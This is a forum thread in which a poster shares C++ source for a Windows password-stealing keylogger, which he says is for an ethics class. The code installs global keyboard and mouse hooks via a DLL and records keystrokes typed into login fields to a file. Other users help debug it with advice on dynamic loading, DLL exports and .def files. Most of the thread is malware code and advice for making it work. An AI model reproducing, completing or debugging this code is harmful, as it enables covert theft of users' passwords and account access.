I am currently writting a virus for my Computer Ethics Class(Extra Credit), and I have code that should work according to the Platform SDK. What the program should do is monitor all textual input by way of a windows hook, and through cues such as mouse clicks it should record input and save it to file on the presumption that it will eventually catch a password being entered. Here is the WinMain code: int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrecINstance, LPSTR lpCmdLine, int nShowCmd) { HHOOK hkHook; HHOOK hmHook; hkHook = SetWindowsHookEx(WH_KEYBOARD, KeyboardProc, GetModuleHandle("PassLib"), NULL); hmHook = SetWindowsHookEx(WH_MOUSE, MouseProc, GetModuleHandle("PassLib"), NULL); for(; { if(KEY_DOWN(VK_ESCAPE)) break; } UnhookWindowsHookEx(hkHook); UnhookWindowsHookEx(hmHook); return NULL; } The functions MouseProc and KeyboardProc are located in a seperate DLL which is inplicitly linked. Should I try explicit linking? The reason I know this isn''t working is because I have a call to write "DEBUG" to a file at the beginning of each DLL function, as well as calls to open and close the file. I have also tried Setting the Windows Hooks from a function within the DLL. Nothing seems to work. -Brent Robinson

i don''t get why you need MOUSE input in order to get the password?

if you want to catch the kb input of a specified window i can help you, let me know if i understand you right

Arkon
http://qsoft.cjb.net

The reason I need mouse input is because the user of apps like Compuserve or AOL either have to Click a edit control or Tab-advance to the proper control. Thus, I use the mouse down messages to signal that a password is finished, or that one is about to be entered.

If you could help me with the keyboard hook, I would be forever grateful. BTW, here is my hook procedure code:

bool bPasswordEnter = false;
DWORD PasswordStartTime = 0;
char Password[PASSWORD_MAX + 1];
int CaretPosition = 0;
HHOOK hkHook = NULL;
HHOOK hmHook = NULL;
bool bQuit = false;
fstream File;
HINSTANCE hDLL;

bool ProcessKeyboard(WPARAM KeyCode, LPARAM KstrkData)
{
File.write("DEBUG\n", 7);

UINT RepeatCount = LOWORD(KstrkData);

if(KeyCode <= 47)
return true;
else if(KeyCode <= 57 || KeyCode == VK_SPACE)
{
for(; RepeatCount; RepeatCount--)
{
Password[CaretPosition] = KeyCode;
CaretPosition++;
}
return true;
}
else if(KeyCode >= 65 && KeyCode <= 90)
{
for(; RepeatCount; RepeatCount--)
{
Password[CaretPosition] = ((KeyCode & MK_SHIFT)? KeyCode : KeyCode + CASE_DIF);
CaretPosition++;
}
return true;
}
else if(KeyCode == VK_LEFT)
{
for(; RepeatCount && CaretPosition; RepeatCount--)
CaretPosition--;
return true;
}
else if(KeyCode == VK_RIGHT)
{
for(; RepeatCount && Password[CaretPosition + 1] != -1; RepeatCount--)
CaretPosition++;
return true;
}
else if(KeyCode == VK_RETURN && bPasswordEnter)
{
Serialize();
}


return true;
}


PASS_API LRESULT CALLBACK KeyboardProc(int nCode, WPARAM wParam, LPARAM lParam)
{
File.write("DEBUG\n", 7);

if((GetTickCount() - PasswordStartTime) > PASSWORD_TIME_OUT)
bPasswordEnter = false;

if(!(lParam & KF_UP))
{
if(wParam == VK_TAB)
{
PasswordStartTime = GetTickCount();
bPasswordEnter = true;
CaretPosition = 0;
}
else if(wParam == VK_ESCAPE)
{
bPasswordEnter = false;
bQuit = true;
}
else if(bPasswordEnter && !(wParam & MK_CONTROL))
{
if(!ProcessKeyboard(wParam, lParam))
bPasswordEnter = false;
}
}

if(nCode < 0)
return CallNextHookEx(hkHook, nCode, wParam, lParam);
else
return 0;
}


PASS_API LRESULT CALLBACK MouseProc(int nCode, WPARAM wParam, LPARAM lParam)
{
File.write("DEBUG\n", 7);

if((GetTickCount() - PasswordStartTime) > PASSWORD_TIME_OUT)
bPasswordEnter = false;

switch(wParam)
{
case WM_LBUTTONDOWN:
if(bPasswordEnter)
{
Serialize();
break;
}

PasswordStartTime = GetTickCount();
bPasswordEnter = true;
CaretPosition = 0;
break;
}

if(nCode < 0)
return CallNextHookEx(hmHook, nCode, wParam, lParam);
else
return 0;
}


Hope this helps you in helping me!

-Brent Robinson

that code needs some major tabbing and whitespace!

for one thing, check the code first, and if it is less than 0, then call the next hook and dont process anything

also, use LoadLibrary to link it to the DLL you are using and GetProcAddress to get the address of the function that you are using to process the hook

Edited by - sarem on April 20, 2001 1:40:02 AM

Sarem: I tried LoadLibrary, and it compiled, but the code I used wasn''t working. Here it is (appologies for bad-formating, as I''m not an HTML junkie):


typedef HINSTANCE (__stdcall* PINIT)(HINSTANCE);
typedef bool (__stdcall* PUNINIT)();

PINIT pInitPassLib;
PUNINIT pUnInitPassLib;
HINSTANCE hDll;

hDll = LoadLibrary("PassLib");
if(!hDll)
return NULL;

pInitPassLib = (PINIT)GetProcAddress(hDll, "InitPassLib");
pUnInitPassLib = (PUNINIT)GetProcAddress(hDll, "UnInitPassLib");

if(!pInitPassLib || !pUnInitPassLib)
{
FreeLibrary(hDll);
return NULL;
}

if(!pInitPassLib(hDll))
{
FreeLibrary(hDll);
return NULL;
}

When I ran this I got NULL returns for both calls to GetProcAddress.

Also, I will try shifting the check on nCode to the beginning of the function, though I can''t see how it would change anything...

Thanks again for helping!

-Brent Robinson

did you make a .def file for you .dll???
cuz if not, then this is your prob-->that''s why you get null when trying to get the procs addresses

Arkon
http://qsoft.cjb.net

Arkon: How would you go about making a .DEF file? The MSDN documentation is consistantly wretched, and it is difficult for me to make anything of it. Do you know the specific format?

-Brent Robinson

hmm i don''t know a specific format

but it goes something like this:

every function you want to export(means: you can GetProcAddr)
you have to write in front of the declaration this: "_declspec(dllexport)"
so
void bla();
will be:

_declspec(dllexport) void bla();

easy!

now in your .def file,
first create a .def file which has same name as your source file
IIRC

ok in the .def you write these:

; dllname.def : Declares the module parameters for the DLL.

LIBRARY "hook"
DESCRIPTION ''hook Windows Dynamic Link Library''

EXPORTS


well that''s it i guess

BTW-do you have shared data segment??

i hope i helped!


Arkon
http://qsoft.cjb.net